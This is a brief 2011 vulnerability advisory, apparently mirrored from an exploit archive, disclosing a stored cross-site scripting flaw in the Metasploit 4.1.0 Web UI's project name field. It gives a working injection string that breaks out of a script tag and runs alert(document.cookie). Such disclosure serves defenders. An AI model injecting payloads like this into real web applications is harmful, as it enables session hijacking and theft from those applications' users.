id: 17016
date: 10/19/2011
title: Metasploit 4.1.0 Web UI stored XSS Vulnerability
author: Stefan Schurtz
cves: 

Advisory:                   Metasploit 4.1.0 Web UI stored XSS vulnerability
Advisory ID:            SSCHADV2011-033
Author:                     Stefan Schurtz
Affected Software:      Successfully tested on Metasploit Community Edition
Vendor URL:             http://metasploit.com/
Vendor Status:          informed
 
==========================
Vulnerability Description:
==========================
 
Metasploit 4.1.0 Web UI "project[name]" parameter is prone to a XSS vulnerability
 
==================
Technical Details:
==================
 
Login to Web UI -> Create New Project -> Project name -> '"</script><script>alert(document.cookie)</script>
 
========
Credits:
========
 
Vulnerability found and advisory written by Stefan Schurtz.



#  0day.today [2023-03-22]  #